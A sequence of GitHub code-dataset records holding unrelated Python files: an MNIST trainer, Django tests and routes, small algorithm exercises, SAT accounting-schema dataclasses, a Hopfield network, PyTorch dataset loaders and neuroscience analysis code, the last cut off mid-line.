tmp_accu_vali / k)\r\n \r\ndef main():\r\n # 读取数据集\r\n mnist = input_data.read_data_sets('./mnist_dataset', one_hot=True)\r\n # 训练集\r\n total_images = mnist.train.images\r\n total_labels = mnist.train.labels\r\n total_images, total_labels = shuffer_images_and_labels(total_images, total_labels)\r\n # 验证集\r\n validation_images = mnist.validation.images\r\n validation_labels = mnist.validation.labels\r\n validation_images, validation_labels = shuffer_images_and_labels(validation_images, validation_labels)\r\n\r\n # print(total_images.shape, total_labels.shape)\r\n # print(validation_images.shape, validation_labels.shape)\r\n # print(get_label(total_labels[0]))\r\n # show_image(total_images[0])\r\n\r\n # 简单划分前50000个为训练集,后5000个为测试集,对其进行训练,并使用验证集评估模型\r\n print(\"简单划分前50000个为训练集,后5000个为测试集,对其进行训练,并使用验证集评估模型\")\r\n origin_images_train = total_images[:50000]\r\n origin_labels_train = total_labels[:50000]\r\n origin_images_test = total_images[50000:]\r\n origin_labels_test = total_labels[50000:]\r\n accu_test,accu_validation = 
train_and_test(origin_images_train, origin_labels_train, origin_images_test, origin_labels_test,\r\n validation_images, validation_labels)\r\n print(\"[*] Accuracy of test :\", accu_test)\r\n print(\"[*] Accuracy of validation :\", accu_validation)\r\n\r\n\r\n # 使用分层采样的留出法训练、测试模型,并使用验证集评估模型\r\n # h = 0.8\r\n # print(\"使用分层采样的留出法训练、测试模型,并使用验证集评估模型\")\r\n # print(\"划分比例为 {}%\".format(h * 100))\r\n # origin_images_train, origin_labels_train, origin_images_test, origin_labels_test = hold_out(total_images, total_labels, h)\r\n # accu_test,accu_validation = train_and_test(origin_images_train, origin_labels_train, origin_images_test, origin_labels_test,\r\n # validation_images, validation_labels)\r\n # print(\"[*] Accuracy of test :\", accu_test)\r\n # print(\"[*] Accuracy of validation :\", accu_validation)\r\n\r\n # 使用分层采样的k折交叉验证法训练、测试模型,并使用验证集评估模型\r\n # k = 20\r\n # print(\"使用分层采样的k折交叉验证法训练、测试模型,并使用验证集评估模型\")\r\n # print(\"k =\", k)\r\n # cross_validation(total_images, total_labels, k, validation_images, validation_labels)\r\n\r\nif __name__ == '__main__':\r\n main()","repo_name":"lucifer9735/tensorflow_mnist","sub_path":"mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":10631,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"461342199","text":"# coding: utf-8\n\nfrom __future__ import unicode_literals\n\nimport pytest\nfrom django.core.files.base import ContentFile\n\nfrom common.models.schedule import Supplier, RThread\nfrom common.models.tariffs import ThreadTariff\nfrom travel.rasp.admin.importinfo.models.two_stage_import import TwoStageImportPackage, TSISetting\nfrom travel.rasp.admin.lib.logs import get_collector_context\nfrom tester.factories import create_currency\n\n\n@pytest.mark.dbuser\n@pytest.mark.usefixtures('setup_cysix_test_case')\nclass TestMaskEveryNDay(object):\n def setup(self):\n create_currency(code='USD')\n self.supplier = Supplier.objects.get(code='supplier_1')\n self.package = TwoStageImportPackage.objects.get(supplier=self.supplier)\n TSISetting.objects.get_or_create(package=self.package)\n\n def reimport(self):\n factory = self.package.get_two_stage_factory()\n\n self.package.package_file = ContentFile(CYSIX_XML)\n\n importer = factory.get_two_stage_importer()\n importer.reimport_package()\n\n def test_import_thread_when_fares_are_invalid(self):\n with get_collector_context() as log_cpllector:\n self.reimport()\n log_messages = log_cpllector.get_collected(clean=False).strip().splitlines(False)\n\n thread = RThread.objects.get()\n assert not ThreadTariff.objects.filter(thread_uid=thread.uid).exists()\n\n expected_log_message = (\n 'ERROR: '\n 'Пропускаем тарифы для '\n '> '\n 'Станции '\n 'нет в блоке stations'\n )\n assert expected_log_message in log_messages\n\n\nCYSIX_XML = \"\"\"\n\n\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n\"\"\".strip()\n","repo_name":"Alexander-Berg/2022-test-examples-3","sub_path":"travel/tests/fares/test_import_thread_when_fares_are_invalid.py","file_name":"test_import_thread_when_fares_are_invalid.py","file_ext":"py","file_size_in_byte":2954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38122657610","text":"\"\"\"\nURL mapping for user API\n\"\"\"\nfrom django.urls import path\nfrom knox import views as knox_views\nfrom user import views\n\napp_name = 'user'\nurlpatterns = [\n path(\n 'register-by-access-token/social/google-oauth2/',\n 
views.LoginWithGoogle.as_view(),\n name='login_with_google'\n ),\n path('logout/', knox_views.LogoutView.as_view(), name='knox_logout'),\n path(\n 'logout-all-device/',\n knox_views.LogoutAllView.as_view(),\n name='knox_logoutall'\n ),\n]\n","repo_name":"qitpy/django-server","sub_path":"src/user/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"38291030267","text":"import sys\r\n\r\nmovies_count = int(input())\r\n\r\nbest_movie = \"\"\r\nworst_movie = \"\"\r\nbest_move_rating = 0\r\nworst_movie_rating = sys.maxsize\r\nall_rating = 0\r\n\r\nfor i in range(1, movies_count + 1):\r\n movie = input()\r\n rating = float(input())\r\n \r\n all_rating += rating\r\n \r\n if rating > best_move_rating:\r\n best_movie = movie\r\n best_move_rating = rating\r\n \r\n elif rating < worst_movie_rating:\r\n worst_movie = movie\r\n worst_movie_rating = rating\r\n \r\naverage_rating = all_rating / movies_count\r\n\r\nprint(f\"{best_movie} is with highest rating: {best_move_rating:.1f}\")\r\nprint(f\"{worst_movie} is with lowest rating: {worst_movie_rating:.1f}\")\r\nprint(f\"Average rating: {average_rating:.1f}\")\r\n","repo_name":"vkostoff/SoftUni_Python","sub_path":"Programming_Basics/Programming_Basics_Online_Exam_6_and_7_April_2019/movie_ratings.py","file_name":"movie_ratings.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72128935914","text":"from math import comb,gcd,log\nclass Solution:\n def coutPairs(self, nums: list[int], k: int) -> int:\n l={};ans=c=0\n for i in nums:\n g=gcd(k,i)\n l[g]=l.get(g,0)+1\n for i in l:\n if (i*i)%k==0:c+=comb(l[i],2)\n for i in l:\n for j in l:\n if j!=i and (i*j)%k==0:ans+=l[i]*l[j]\n return ans//2 + c","repo_name":"bambamshivam/LeetCode","sub_path":"Weekly_Contest_281/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"31044006089","text":"from dataclasses import dataclass, field\nfrom decimal import Decimal\nfrom typing import List, Optional\nfrom xsdata.models.datatype import XmlDate\n\n__NAMESPACE__ = \"http://www.sat.gob.mx/esquemas/ContabilidadE/1_3/AuxiliarCtas\"\n\n\n@dataclass\nclass AuxiliarCtas:\n \"\"\"\n Estándar de auxiliar de la cuenta o subcuenta del periodo que se entrega\n como parte de la contabilidad electrónica.\n\n :ivar cuenta: Nodo obligatorio para expresar los movimientos del\n periodo de cada uno de los auxiliares de la cuenta y/o\n subcuenta.\n :ivar version: Atributo requerido para expresar la versión del\n formato.\n :ivar rfc: Atributo requerido para expresar el RFC del contribuyente\n que envía los datos.\n :ivar mes: Atributo requerido para expresar el mes en que inicia la\n vigencia del auxiliar de la cuenta o subcuenta.\n :ivar anio: Atributo requerido para expresar el año al que inicia la\n vigencia del auxiliar de la cuenta o subcuenta.\n :ivar tipo_solicitud: Atributo requerido para expresar el tipo de\n envío del auxiliar de la cuenta o subcuenta ( AF - Acto de\n Fiscalización; FC - Fiscalización Compulsa; DE - Devolución; CO\n - Compensación )\n :ivar num_orden: Atributo opcional para expresar el número de orden\n asignado al acto de fiscalización al que hace referencia la\n solicitud del auxiliar de la cuenta o subcuenta. Requerido para\n tipo de solicitud = AF y FC. 
Se convierte en requerido cuando se\n cuente con la información.\n :ivar num_tramite: Atributo opcional para expresar el número de\n trámite asignado a la solicitud de devolución o compensación al\n que hace referencia el auxiliar de la cuenta o subcuenta.\n Requerido para tipo de solicitud = DE o CO. Se convierte en\n requerido cuando se cuente con la información.\n :ivar sello: Atributo opcional para contener el sello digital del\n archivo de contabilidad electrónica. El sello deberá ser\n expresado cómo una cadena de texto en formato Base 64\n :ivar no_certificado: Atributo opcional para expresar el número de\n serie del certificado de sello digital que ampara el archivo de\n contabilidad electrónica, de acuerdo al acuse correspondiente a\n 20 posiciones otorgado por el sistema del SAT.\n :ivar certificado: Atributo opcional que sirve para expresar el\n certificado de sello digital que ampara al archivo de\n contabilidad electrónica como texto, en formato base 64.\n \"\"\"\n class Meta:\n namespace = \"http://www.sat.gob.mx/esquemas/ContabilidadE/1_3/AuxiliarCtas\"\n namespace_prefix = \"AuxiliarCtas\"\n schema_location = \"http://www.sat.gob.mx/esquemas/ContabilidadE/1_3/AuxiliarCtas/AuxiliarCtas_1_3.xsd\"\n\n cuenta: List[\"AuxiliarCtas.Cuenta\"] = field(\n default_factory=list,\n metadata={\n \"name\": \"Cuenta\",\n \"type\": \"Element\",\n \"min_occurs\": 1,\n }\n )\n version: str = field(\n init=False,\n default=\"1.3\",\n metadata={\n \"name\": \"Version\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n rfc: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"RFC\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_length\": 12,\n \"max_length\": 13,\n \"pattern\": r\"[A-ZÑ&]{3,4}[0-9]{2}[0-1][0-9][0-3][0-9][A-Z0-9]?[A-Z0-9]?[0-9A-Z]?\",\n }\n )\n mes: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"Mes\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n anio: Optional[int] = field(\n default=None,\n metadata={\n \"name\": \"Anio\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_inclusive\": 2015,\n \"max_inclusive\": 2099,\n }\n )\n tipo_solicitud: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"TipoSolicitud\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"pattern\": r\"AF|FC|DE|CO\",\n }\n )\n num_orden: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"NumOrden\",\n \"type\": \"Attribute\",\n \"length\": 13,\n \"pattern\": r\"[A-Z]{3}[0-9]{7}(/)[0-9]{2}\",\n }\n )\n num_tramite: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"NumTramite\",\n \"type\": \"Attribute\",\n \"length\": 14,\n \"pattern\": r\"[A-Z]{2}[0-9]{12}\",\n }\n )\n sello: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"Sello\",\n \"type\": \"Attribute\",\n \"white_space\": \"collapse\",\n }\n )\n no_certificado: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"noCertificado\",\n \"type\": \"Attribute\",\n \"length\": 20,\n }\n )\n certificado: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"Certificado\",\n \"type\": \"Attribute\",\n \"white_space\": \"collapse\",\n }\n )\n\n @dataclass\n class Cuenta:\n \"\"\"\n :ivar detalle_aux: Nodo obligatorio para expresar el detalle de\n los movimientos del periodo de cada uno de los auxiliares\n :ivar num_cta: Atributo requerido para expresar la clave con que\n se distingue la cuenta o subcuenta que se afecta por la\n transacción que integra el auxiliar.\n :ivar des_cta: Atributo requerido 
para expresar el concepto de\n la cuenta o subcuenta que se afecta por la transacción que\n integra el auxiliar.\n :ivar saldo_ini: Atributo requerido para expresar el monto del\n saldo inicial de la cuenta o subcuenta del periodo del\n auxiliar. En caso de no existir dato, colocar cero (0)\n :ivar saldo_fin: Atributo requerido para expresar el monto del\n saldo final de la cuenta o subcuenta del periodo del\n auxiliar. En caso de no existir dato, colocar cero (0)\n \"\"\"\n detalle_aux: List[\"AuxiliarCtas.Cuenta.DetalleAux\"] = field(\n default_factory=list,\n metadata={\n \"name\": \"DetalleAux\",\n \"type\": \"Element\",\n \"min_occurs\": 1,\n }\n )\n num_cta: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"NumCta\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_length\": 1,\n \"max_length\": 100,\n }\n )\n des_cta: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"DesCta\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_length\": 1,\n \"max_length\": 100,\n }\n )\n saldo_ini: Optional[Decimal] = field(\n default=None,\n metadata={\n \"name\": \"SaldoIni\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_inclusive\": Decimal(\"-9999999999999999999999.99\"),\n \"max_inclusive\": Decimal(\"9999999999999999999999.99\"),\n \"fraction_digits\": 2,\n }\n )\n saldo_fin: Optional[Decimal] = field(\n default=None,\n metadata={\n \"name\": \"SaldoFin\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_inclusive\": Decimal(\"-9999999999999999999999.99\"),\n \"max_inclusive\": Decimal(\"9999999999999999999999.99\"),\n \"fraction_digits\": 2,\n }\n )\n\n @dataclass\n class DetalleAux:\n \"\"\"\n :ivar fecha: Atributo requerido para expresar la fecha de\n registro de la transacción que afecta la cuenta o\n subcuenta que integra el auxiliar.\n :ivar num_un_iden_pol: Atributo requerido para expresar el\n número único de identificación de la póliza. El campo\n deberá contener la clave o nombre utilizado por el\n contribuyente para diferenciar, el tipo de póliza y el\n número correspondiente. En un mes ordinario no debe\n repetirse un mismo número de póliza con la clave o\n nombre asignado por el contribuyente.\n :ivar concepto: Atributo requerido para expresar el concepto\n de la transacción que integra el auxiliar.\n :ivar debe: Atributo requerido para expresar el monto del\n cargo de la cuenta o subcuenta de la transacción que\n integra el auxiliar. En caso de no existir dato, colocar\n cero (0)\n :ivar haber: Atributo requerido para expresar el monto del\n abono de la cuenta o subcuenta de la transacción que\n integra el auxiliar. 
En caso de no existir dato, colocar\n cero (0)\n \"\"\"\n fecha: Optional[XmlDate] = field(\n default=None,\n metadata={\n \"name\": \"Fecha\",\n \"type\": \"Attribute\",\n \"required\": True,\n }\n )\n num_un_iden_pol: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"NumUnIdenPol\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_length\": 1,\n \"max_length\": 50,\n }\n )\n concepto: Optional[str] = field(\n default=None,\n metadata={\n \"name\": \"Concepto\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_length\": 1,\n \"max_length\": 200,\n }\n )\n debe: Optional[Decimal] = field(\n default=None,\n metadata={\n \"name\": \"Debe\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_inclusive\": Decimal(\"-9999999999999999999999.99\"),\n \"max_inclusive\": Decimal(\"9999999999999999999999.99\"),\n \"fraction_digits\": 2,\n }\n )\n haber: Optional[Decimal] = field(\n default=None,\n metadata={\n \"name\": \"Haber\",\n \"type\": \"Attribute\",\n \"required\": True,\n \"min_inclusive\": Decimal(\"-9999999999999999999999.99\"),\n \"max_inclusive\": Decimal(\"9999999999999999999999.99\"),\n \"fraction_digits\": 2,\n }\n )\n","repo_name":"verumconsilium/pyconte","sub_path":"pyconte/auxiliar_ctas_1_3.py","file_name":"auxiliar_ctas_1_3.py","file_ext":"py","file_size_in_byte":11071,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41772786036","text":"import random\nimport time\n\ndef insertionSort(lista):\n for index in range(1,len(lista)):\n\n atual = lista[index]\n posicao = index\n\n while posicao>0 and lista[posicao-1]>atual:\n lista[posicao]=lista[posicao-1]\n posicao = posicao-1\n\n lista[posicao]=atual\n\n\n\nnum = 1000\n #num = 5000\n#num = 10000\n#num = 15000\n#num = 20000\n#num = 25000\n\n\n#lista de 1 a num\n\n\nlista = []\nfor i in range(num):\n lista.append(i + 1)\n\n\n#lista de num a 1\n\n'''\nlista = []\ni = num\nwhile i <= num and i != 0:\n lista.append(i);\n i -= 1;\n'''\n\n\n#lista aleatória\n#lista = random.sample(range(num), num)\n\ninicio = time.time()\ninsertionSort(lista)\nfim = time.time()\nprint(lista)\nprint(fim - inicio)","repo_name":"HenriqueLeal/AlgoritmosDeOrdenacao","sub_path":"insertsort.py","file_name":"insertsort.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29549092300","text":"# -*- coding: utf-8 -*-\n\nfrom typing import Dict, List, Tuple\n\nimport albumentations as A\nimport cv2\nimport torch\n\nfrom dataset.base_dataset import _BaseSODDataset\nfrom dataset.transforms.resize import ms_resize, ss_resize\nfrom dataset.transforms.rotate import UniRotate\nfrom utils.builder import DATASETS\nfrom utils.io.genaral import get_datasets_info_with_keys\nfrom utils.io.image import read_color_array, read_gray_array\n\n\n@DATASETS.register(name=\"msi_cod_te\")\nclass MSICOD_TestDataset(_BaseSODDataset):\n def __init__(self, root: Tuple[str, dict], shape: Dict[str, int], interp_cfg: Dict = None):\n super().__init__(base_shape=shape, interp_cfg=interp_cfg)\n self.datasets = get_datasets_info_with_keys(dataset_infos=[root], extra_keys=[\"mask\"])\n self.total_image_paths = self.datasets[\"image\"]\n self.total_mask_paths = self.datasets[\"mask\"]\n self.image_norm = A.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225))\n\n def __getitem__(self, index):\n image_path = self.total_image_paths[index]\n mask_path = self.total_mask_paths[index]\n\n image = 
read_color_array(image_path)\n\n image = self.image_norm(image=image)[\"image\"]\n\n base_h = self.base_shape[\"h\"]\n base_w = self.base_shape[\"w\"]\n images = ms_resize(image, scales=(0.5, 1.0, 1.5), base_h=base_h, base_w=base_w)\n image_0_5 = torch.from_numpy(images[0]).permute(2, 0, 1)\n image_1_0 = torch.from_numpy(images[1]).permute(2, 0, 1)\n image_1_5 = torch.from_numpy(images[2]).permute(2, 0, 1)\n\n return dict(\n data={\n \"image1.5\": image_1_5,\n \"image1.0\": image_1_0,\n \"image0.5\": image_0_5,\n },\n info=dict(\n mask_path=mask_path,\n ),\n )\n\n def __len__(self):\n return len(self.total_image_paths)\n\n\n@DATASETS.register(name=\"msi_cod_tr\")\nclass MSICOD_TrainDataset(_BaseSODDataset):\n def __init__(\n self, root: List[Tuple[str, dict]], shape: Dict[str, int], extra_scales: List = None, interp_cfg: Dict = None\n ):\n super().__init__(base_shape=shape, extra_scales=extra_scales, interp_cfg=interp_cfg)\n self.datasets = get_datasets_info_with_keys(dataset_infos=root, extra_keys=[\"mask\"])\n self.total_image_paths = self.datasets[\"image\"]\n self.total_mask_paths = self.datasets[\"mask\"]\n self.joint_trans = A.Compose(\n [\n A.HorizontalFlip(p=0.5),\n UniRotate(limit=10, interpolation=cv2.INTER_LINEAR, p=0.5),\n A.Normalize(mean=(0.485, 0.456, 0.406), std=(0.229, 0.224, 0.225)),\n ],\n )\n self.reszie = A.Resize\n\n def __getitem__(self, index):\n image_path = self.total_image_paths[index]\n mask_path = self.total_mask_paths[index]\n\n image = read_color_array(image_path)\n mask = read_gray_array(mask_path, to_normalize=True, thr=0.5)\n\n transformed = self.joint_trans(image=image, mask=mask)\n image = transformed[\"image\"]\n mask = transformed[\"mask\"]\n\n base_h = self.base_shape[\"h\"]\n base_w = self.base_shape[\"w\"]\n images = ms_resize(image, scales=(0.5, 1.0, 1.5), base_h=base_h, base_w=base_w)\n image_0_5 = torch.from_numpy(images[0]).permute(2, 0, 1)\n image_1_0 = torch.from_numpy(images[1]).permute(2, 0, 1)\n image_1_5 = torch.from_numpy(images[2]).permute(2, 0, 1)\n\n mask = ss_resize(mask, scale=1.0, base_h=base_h, base_w=base_w)\n mask_1_0 = torch.from_numpy(mask).unsqueeze(0)\n\n return dict(\n data={\n \"image1.5\": image_1_5,\n \"image1.0\": image_1_0,\n \"image0.5\": image_0_5,\n \"mask\": mask_1_0,\n }\n )\n\n def __len__(self):\n return len(self.total_image_paths)\n","repo_name":"lartpang/ZoomNet","sub_path":"dataset/msi_cod.py","file_name":"msi_cod.py","file_ext":"py","file_size_in_byte":3878,"program_lang":"python","lang":"en","doc_type":"code","stars":105,"dataset":"github-code","pt":"72"} +{"seq_id":"8522876769","text":"import random\nimport math\nimport numpy as np\n\n\nclass HopfieldNetwork:\n def __init__(self, dimension: int, threshold: int = 1000):\n self._taught_shapes = []\n self._dimension = dimension\n self._adjusted_shape = None\n self._amount_of_neurons = int(math.pow(dimension, 2))\n\n self._W = np.zeros(\n (self._amount_of_neurons, self._amount_of_neurons),\n dtype=float\n )\n\n self._threshold = threshold\n self._useless_iteration_count = 0\n\n def teach(self, shape):\n self._taught_shapes.append(shape)\n for i in range(0, self._amount_of_neurons):\n for j in range(0, self._amount_of_neurons):\n if i == j:\n self._W[i][j] = 0\n else:\n y1 = int(i / self._dimension)\n x1 = i % self._dimension\n\n y2 = int(j / self._dimension)\n x2 = j % self._dimension\n\n self._W[i][j] += (shape[y1][x1] * shape[y2][x2])\n\n def recognize(self, shape: np.ndarray):\n self._useless_iteration_count = 0\n self._adjusted_shape = shape\n 
iterations_amount = 0\n\n while not self._is_shape_recognized():\n iterations_amount += 1\n\n self._recognition_step()\n\n if self._useless_iteration_count >= self._threshold:\n return False, self._adjusted_shape, iterations_amount\n\n return True, self._adjusted_shape, iterations_amount\n\n def _recognition_step(self):\n index = random.randint(0, self._amount_of_neurons - 1)\n\n temp = 0\n for i in range(0, self._amount_of_neurons):\n y = int(i / self._dimension)\n x = i % self._dimension\n temp += (self._adjusted_shape[y][x] * self._W[i][index])\n\n adjusted_value = 1 if temp > 0 else -1\n\n y = int(index / self._dimension)\n x = index % self._dimension\n\n if adjusted_value != self._adjusted_shape[y][x]:\n self._adjusted_shape[y][x] = adjusted_value\n self._useless_iteration_count = 0\n else:\n self._useless_iteration_count += 1\n\n def _is_shape_recognized(self):\n for shape in self._taught_shapes:\n if np.array_equal(self._adjusted_shape, shape):\n return True\n\n return False\n","repo_name":"NasterVill/BSUIR_Labs","sub_path":"7 term/DSIP-Digital-Signal-and-Image-Processing/Lab 3/HopfieldNetwork.py","file_name":"HopfieldNetwork.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"72"} +{"seq_id":"36780969180","text":"from rec import *\nimport matplotlib.pyplot as plt\nfrom rec_utils import *\nimport math\nfrom matplotlib.lines import Line2D\nfrom itertools import chain\n\ndef selectivity_count_plot(subject_list, version_aov, version_fr, selection_list, area_list):\n\n # subject_list = ['Oscar', 'Gonzo']\n # version_aov = 'PresentedStimulus'\n # version_fr = 'ConcatFactor'\n # selection_list = ['PreDist', 'Gating', 'PostDist', 'Target']\n # area_list = ['PFC']\n # ylim_arg = None\n # title = ''\n\n # version parameters\n v_aov_params = anova_version_aov_params(version_aov, version_fr)\n x_factors = v_aov_params['x_factors']\n x_cluster_label = x_factors[0]\n\n v_fr_params = version_fr_params(version_fr)\n t_start = v_fr_params['t_start']\n t_end = v_fr_params['t_end']\n timebin = v_fr_params['timebin']\n timestep = v_fr_params['timestep']\n\n # init\n md = MetaData()\n db = md.db_base_loader(['sessions', 'units'])\n sessions, units = db['sessions'], db['units']\n\n anova = Anova(DataBase([]), {'aov': version_aov, 'fr': version_fr})\n anova.load_physiology_dict(cropped=True)\n physiology_dict = anova.physiology_dict\n\n if not bool(selection_list):\n selection_list = v_aov_params['selection_dict']['list']\n\n # plotting parameters\n if selection_list == ['All']:\n color_list = ['#d817a5', '#48b213', '#727272']\n shade_color_list = ['#f230be', '#5fce27', '#9b9b9b']\n linewidth_list = [2.5, 2.5, 2.5]\n linestyle_list = [(0, ()), (0, ()), (0, ())]\n line_list = ['PFC', 'Stri', 'IT']\n color = dict(zip(line_list, color_list))\n shade_color = dict(zip(line_list, shade_color_list))\n linewidth = dict(zip(line_list, linewidth_list))\n linestyle = dict(zip(line_list, linestyle_list))\n else:\n color_list = ['#317275', '#dbb356', '#3c3a7a', '#e08e4f', '#808080', '#ffb778', '#e08e4f', '#e08e4f', '#e08e4f',\n '#bd9842', '#282761', '#bd6b2d', '#ab3a0e', '#9e9e9e']\n shade_color_list = ['#49898c', '#e8c36d', '#504dab', '#f0a869', '#a8a8a8', '#eda768', '#f0a869', '#f0a869', '#f0a869',\n '#d1a94b', '#323073', '#db8340', '#c74816', '#a8a8a8']\n linewidth_list = [2, 2, 2.5, 2, 2, 2.5, 2, 2, 2,\n 2, 2, 2, 2, 2]\n # linestyle_list = [(0, ()), (0, (2, 1, 1, 1)), (0, ()), (0, (5, 4)), (0, (5, 1)), (0, ()), (0, (1, 1)), 
(0, (2, 1)), (0, (3, 1)),\n # (0, ()), (0, ()), (0, ()), (0, ()), (0, ())]\n linestyle_list = [(0, ()), (0, ()), (0, ()), (0, ()), (0, ()), (0, ()), (0, ()), (0, ()), (0, ()),\n (0, ()), (0, ()), (0, ()), (0, ()), (0, ())]\n line_list = ['Cue', 'PreDist', 'Gating', 'PostDist', 'Target', 'PreDist_PostDist', 'PostDist1', 'PostDist2', 'PostDist3',\n 'PreDist_From_To_PreDist', 'PreDist_From_To_Gating', 'Gating_From_To_PostDist', 'PostDist_From_To_PostDist', 'PostDist_From_To_Target']\n color = dict(zip(line_list, color_list))\n shade_color = dict(zip(line_list, shade_color_list))\n linewidth = dict(zip(line_list, linewidth_list))\n linestyle = dict(zip(line_list, linestyle_list))\n\n timebin_interval = TimebinInterval(timebin, timestep, t_start, t_end)\n\n\n\n\n ### TODO: polish later. Rushed\n # filter subject units\n units = units.loc[sessions.loc[sessions['Subject'].isin(subject_list)].index]\n # filter only single units of area of interest\n units.drop(units.loc[units['UnitNum'].eq(0) | units['RatingCode'].eq(7) |\n ~units['Area'].isin(area_list)].index, inplace=True)\n # convert units index into tuple\n units['tuple_index'] = units.apply(lambda row: row.name, axis=1)\n units.set_index('tuple_index', drop=True, inplace=True)\n ### TODO: improve all that\n filtered_inds = set(units.index)\n valid_inds = set.intersection(*[set([unit_ind for unit_ind, unit in selection_dict.items() if unit[x_cluster_label]['valid']]) for selection_dict in physiology_dict.values()])\n filtered_valid_inds = set.intersection(filtered_inds, valid_inds)\n\n selective_per_selection_inds = dict([(selection, set([unit_ind for unit_ind, unit in selection_dict.items() if bool(unit[x_cluster_label]['clusters'])]).intersection(filtered_valid_inds)) for selection, selection_dict in physiology_dict.items() if selection in selection_list])\n selective_population_inds = set.union(*[selection_ind for selection_ind in selective_per_selection_inds.values()])\n units_per_area_inds = dict([(area, set(units.loc[units['Area'].eq(area)].index).intersection(filtered_valid_inds)) for area in area_list])\n\n fig = plt.figure(figsize=(1.47, 2.91))\n ax = fig.add_subplot(1, 1, 1)\n\n selective_n = {}\n area_n = {}\n for area in area_list:\n\n selective_n = {}\n area_n = len(units_per_area_inds[area])\n\n for selection in selection_list:\n selective_n[selection] = len(set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])) / area_n * 100\n\n selective_n['All'] = len(set.intersection(*[set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])\n for selection in selection_list])) / area_n * 100\n selective_n['Any'] = len(set.union(*[set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])\n for selection in selection_list])) / area_n * 100\n\n print([el * 100 * area_n for el in selective_n.values()])\n plt.bar(range(len(selective_n)), selective_n.values())\n ax.set_title(area)\n ax.set_ylim(0, 35)\n ax.set_ylabel('Selective Units (%)')\n plt.box(False)\n\n return fig, ax\n\n\ndef selectivity_counts(subject_list, version_aov, version_fr, area, selection_list, selection_mode='Single'):\n\n # subject_list = ['Oscar', 'Gonzo']\n # version_aov = 'PresentedStimulus'\n # version_fr = 'ConcatFactor'\n # selection_list = ['PreDist', 'Gating', 'PostDist', 'Target']\n # area_list = ['PFC']\n # ylim_arg = None\n # title = ''\n\n area_list = [area]\n\n # version parameters\n v_aov_params = anova_version_aov_params(version_aov, version_fr)\n x_factors = 
v_aov_params['x_factors']\n x_cluster_label = x_factors[0]\n\n # init\n md = MetaData()\n db = md.db_base_loader(['sessions', 'units'])\n sessions, units = db['sessions'], db['units']\n\n anova = Anova(DataBase([]), {'aov': version_aov, 'fr': version_fr})\n anova.load_physiology_dict(cropped=True)\n physiology_dict = anova.physiology_dict\n\n if not bool(selection_list):\n selection_list = v_aov_params['selection_dict']['list']\n\n\n ### TODO: polish later. Rushed\n # filter subject units\n units = units.loc[sessions.loc[sessions['Subject'].isin(subject_list)].index]\n # filter only single units of area of interest\n units.drop(units.loc[units['UnitNum'].eq(0) | units['RatingCode'].eq(7) |\n ~units['Area'].isin(area_list)].index, inplace=True)\n # convert units index into tuple\n units['tuple_index'] = units.apply(lambda row: row.name, axis=1)\n units.set_index('tuple_index', drop=True, inplace=True)\n ### TODO: improve all that\n filtered_inds = set(units.index)\n valid_inds = set.intersection(*[set([unit_ind for unit_ind, unit in selection_dict.items() if unit[x_cluster_label]['valid']]) for selection_dict in physiology_dict.values()])\n filtered_valid_inds = set.intersection(filtered_inds, valid_inds)\n\n selective_per_selection_inds = dict([(selection, set([unit_ind for unit_ind, unit in selection_dict.items() if bool(unit[x_cluster_label]['clusters'])]).intersection(filtered_valid_inds)) for selection, selection_dict in physiology_dict.items() if selection in selection_list])\n selective_population_inds = set.union(*[selection_ind for selection_ind in selective_per_selection_inds.values()])\n units_per_area_inds = dict([(area, set(units.loc[units['Area'].eq(area)].index).intersection(filtered_valid_inds)) for area in area_list])\n\n\n selective_n = {}\n area_n = len(units_per_area_inds[area])\n\n for selection in selection_list:\n selective_n[selection] = len(set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])) / area_n * 100\n\n selective_n['All'] = len(set.intersection(*[set.intersection(selective_per_selection_inds[selection], units_per_area_inds[area])\n for selection in selection_list])) / 